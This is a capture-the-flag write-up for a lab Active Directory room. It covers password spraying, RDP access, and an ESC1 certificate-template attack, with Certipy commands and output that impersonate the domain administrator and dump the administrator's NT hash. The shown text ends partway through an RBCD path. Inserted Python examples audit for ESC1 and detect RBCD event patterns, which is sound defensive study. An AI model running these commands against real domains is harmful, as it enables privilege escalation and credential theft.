Ledger is a room where you have to compromise a domain controller. Several paths lead to domain compromise: one uses an RBCD attack, the other a vulnerable certificate template.
Enumeration
As usual, we start by running an nmap scan to identify the services exposed on the machine. We can see straight away that the machine is a domain controller, as it has all the ports typical of a DC.
Recovery of valid accounts
Once I’d noticed that the machine was a DC, I tried to see whether it was possible to retrieve information about the AD anonymously or with the guest account. I found that the guest account was enabled.
With this account, I was able to retrieve the list of domain user descriptions with the following command:
I then noticed that some users had their password stored in the description attribute of their account. Administrators tend to store sensitive information in the descriptions of the accounts they create, forgetting that these descriptions can be read by any user on the domain.
So, by spraying this password against all users, I managed to compromise two accounts:
RDP access
Once the accounts have been compromised, I map the domain by retrieving its information with the following command:
I then see that the susanna_mcknight account can authenticate over RDP to the DC:
So, using these credentials, I obtain RDP access to the machine and retrieve the first flag:
Vulnerable certificates
After failing to escalate privileges from the RDP access, I decided to check whether any certificate templates were vulnerable. To do this, I used Certipy with the following command:
```
$ certipy-ad find -u IVY_WILLIS -p CHANGEME2023! -vulnerable -stdout -dc-ip 10.10.163.155
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 14 enabled certificate templates
[*] Trying to get CA configuration for 'thm-LABYRINTH-CA' via CSRA
[!] Got error while trying to get CA configuration for 'thm-LABYRINTH-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'thm-LABYRINTH-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'thm-LABYRINTH-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : thm-LABYRINTH-CA
    DNS Name                            : labyrinth.thm.local
    Certificate Subject                 : CN=thm-LABYRINTH-CA, DC=thm, DC=local
    Certificate Serial Number           : 5225C02DD750EDB340E984BC75F09029
    Certificate Validity Start          : 2023-05-12 07:26:00+00:00
    Certificate Validity End            : 2028-05-12 07:35:59+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : THM.LOCAL\Administrators
      Access Rights
        ManageCertificates              : THM.LOCAL\Administrators
                                          THM.LOCAL\Domain Admins
                                          THM.LOCAL\Enterprise Admins
        ManageCa                        : THM.LOCAL\Administrators
                                          THM.LOCAL\Domain Admins
                                          THM.LOCAL\Enterprise Admins
        Enroll                          : THM.LOCAL\Authenticated Users
Certificate Templates
  0
    Template Name                       : ServerAuth
    Display Name                        : ServerAuth
    Certificate Authorities             : thm-LABYRINTH-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : THM.LOCAL\Domain Admins
                                          THM.LOCAL\Domain Computers
                                          THM.LOCAL\Enterprise Admins
                                          THM.LOCAL\Authenticated Users
      Object Control Permissions
        Owner                           : THM.LOCAL\Administrator
        Write Owner Principals          : THM.LOCAL\Domain Admins
                                          THM.LOCAL\Enterprise Admins
                                          THM.LOCAL\Administrator
        Write Dacl Principals           : THM.LOCAL\Domain Admins
                                          THM.LOCAL\Enterprise Admins
                                          THM.LOCAL\Administrator
        Write Property Principals       : THM.LOCAL\Domain Admins
                                          THM.LOCAL\Enterprise Admins
                                          THM.LOCAL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'THM.LOCAL\Domain Computers' and 'THM.LOCAL\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
  1
    Template Name                       : Computer2
    Display Name                        : Computer2
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : THM.LOCAL\Domain Admins
                                          THM.LOCAL\Domain Computers
                                          THM.LOCAL\Enterprise Admins
                                          THM.LOCAL\Authenticated Users
      Object Control Permissions
        Owner                           : THM.LOCAL\Administrator
        Write Owner Principals          : THM.LOCAL\Domain Admins
                                          THM.LOCAL\Enterprise Admins
                                          THM.LOCAL\Administrator
        Write Dacl Principals           : THM.LOCAL\Domain Admins
                                          THM.LOCAL\Enterprise Admins
                                          THM.LOCAL\Administrator
        Write Property Principals       : THM.LOCAL\Domain Admins
                                          THM.LOCAL\Enterprise Admins
                                          THM.LOCAL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'THM.LOCAL\Domain Computers' and 'THM.LOCAL\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
```
We can see that the ServerAuth certificate template, published on the thm-LABYRINTH-CA certification authority, is vulnerable to ESC1. The template lets any authenticated domain user enroll while supplying the subject (and therefore the target account name) themselves, and its EKU allows Client Authentication. This means that any user can obtain a certificate that lets them authenticate as any account.
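The ESC1 conditions Certipy reports above, written out as a small auditing check (an added example, not code from the write-up or from Certipy). The template dicts are constructed from the ServerAuth and Computer2 output on this page; the `HARDENED` variant is hypothetical and shows which single change closes the finding.

```python
# Groups a low-privileged user is a member of by default; Certipy flags these.
LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}

def esc1_findings(template: dict) -> list:
    """List the ESC1 preconditions this template meets (all five present = ESC1).

    Fixing any one of them closes the path: remove the EnrolleeSuppliesSubject
    flag, drop Client Authentication from the EKU, require manager approval or an
    authorized signature, or restrict enrollment rights to the intended principals.
    """
    findings = []
    # Principals are reported as 'THM.LOCAL\Group'; compare on the group name only.
    low = [p for p in template["enrollment_rights"] if p.split("\\")[-1] in LOW_PRIV]
    if low:
        findings.append("low-privileged enrollment: " + ", ".join(low))
    if template["enrollee_supplies_subject"]:
        findings.append("enrollee supplies subject")
    if "Client Authentication" in template["eku"]:
        findings.append("client authentication EKU")
    if not template["requires_manager_approval"]:
        findings.append("no manager approval")
    if template["authorized_signatures_required"] == 0:
        findings.append("no authorized signature required")
    return findings

def is_esc1(template: dict) -> bool:
    return len(esc1_findings(template)) == 5

def is_esc1_exploitable(template: dict) -> bool:
    """Certipy flags Computer2 too, but only a published (Enabled) template can be used."""
    return is_esc1(template) and template["enabled"]

# Constructed from the Certipy output on this page.
SERVER_AUTH = {
    "name": "ServerAuth", "enabled": True,
    "enrollee_supplies_subject": True,
    "eku": ["Client Authentication", "Server Authentication"],
    "requires_manager_approval": False, "authorized_signatures_required": 0,
    "enrollment_rights": ["THM.LOCAL\\Domain Admins", "THM.LOCAL\\Domain Computers",
                          "THM.LOCAL\\Enterprise Admins", "THM.LOCAL\\Authenticated Users"],
}
COMPUTER2 = dict(SERVER_AUTH, name="Computer2", enabled=False)
# Hypothetical hardened copy: the CA builds the subject from AD instead of the request.
HARDENED = dict(SERVER_AUTH, name="ServerAuthFixed", enrollee_supplies_subject=False)

if __name__ == "__main__":
    for t in (SERVER_AUTH, COMPUTER2, HARDENED):
        print(t["name"], "ESC1" if is_esc1(t) else "ok", esc1_findings(t))
```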
So, using the following command, we can request a certificate for the domain administrator:
```
$ certipy-ad req -username '[email protected]' -password 'C[REDACTED]!' -ca thm-LABYRINTH-CA -target labyrinth.thm.local -template ServerAuth -upn [email protected]
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 25
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
We can then use this certificate to retrieve the NT hash of the domain administrator account:
```
$ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:07d6[REDACTED]2322
```
Next, the DC can be compromised using this password hash. However, as the administrator account is a member of the Protected Users group (which prevents it from authenticating with NTLM), you need to map the domain name to the DC's IP address in /etc/hosts in order to authenticate with Kerberos.
Another method: RBCD attack
An analysis of the relationships between domain objects with BloodHound reveals another way of compromising the domain: the guest user has GenericWrite rights on the DC machine account, which enables a Resource Based Constrained Delegation (RBCD) attack.
To carry out this attack, you need to control a machine account. By default, any domain user can add up to 10 machine accounts to the domain, so we can use the credentials retrieved earlier to create a machine account that we control.
Next, we configure the DC machine account so that our machine account is allowed to request delegated tickets on behalf of other users in order to authenticate to the DC.
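Detection logic for the two steps of the RBCD path just described, run over constructed Windows Security event records (an added example, not part of the write-up). Event 4741 (computer account created) covers the machine-account step and event 5136 (directory service object modified) covers the write to msDS-AllowedToActOnBehalfOfOtherIdentity; the field names follow the Windows event schema but the records, the EVILPC$ account name and the svc_deploy user are constructed.

```python
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample events; only the fields the detector reads are included.
EVENTS = [
    {"EventID": 4741, "SubjectUserName": "guest", "SubjectGroups": (),
     "TargetUserName": "EVILPC$", "TimeCreated": "2023-05-12T10:01:00Z"},
    {"EventID": 5136, "SubjectUserName": "guest", "SubjectGroups": (),
     "ObjectDN": "CN=LABYRINTH,OU=Domain Controllers,DC=thm,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "Value Added",
     "TimeCreated": "2023-05-12T10:02:30Z"},
    # Benign change by an admin to an unrelated attribute: must not alert.
    {"EventID": 5136, "SubjectUserName": "svc_deploy",
     "SubjectGroups": ("Domain Admins",),
     "ObjectDN": "CN=WEB01,OU=Servers,DC=thm,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "OperationType": "Value Added", "TimeCreated": "2023-05-12T10:05:00Z"},
]

def is_privileged(ev: dict) -> bool:
    return bool(PRIVILEGED & set(ev.get("SubjectGroups", ())))

def detect_rbcd(events: list) -> list:
    """Return alert strings in time order.

    MEDIUM: a machine account created by an unprivileged user (MachineAccountQuota
            abuse is the usual first step of RBCD).
    HIGH:   the RBCD attribute written on a domain controller object, or written
            by the same unprivileged principal that just created a machine account.
    """
    alerts, creators = [], set()
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        who = ev["SubjectUserName"]
        if ev["EventID"] == 4741 and not is_privileged(ev):
            creators.add(who)
            alerts.append(f"MEDIUM: {who} created machine account {ev['TargetUserName']}")
        elif ev["EventID"] == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            dn = ev["ObjectDN"]
            sev = "HIGH" if ("OU=Domain Controllers" in dn or who in creators) else "MEDIUM"
            alerts.append(f"{sev}: {who} set {RBCD_ATTR} on {dn}")
    return alerts

if __name__ == "__main__":
    for line in detect_rbcd(EVENTS):
        print(line)
```

Event 5136 is only generated when the Directory Service Changes audit subcategory is enabled and the computer object carries a SACL for attribute writes, so verify that before relying on this rule.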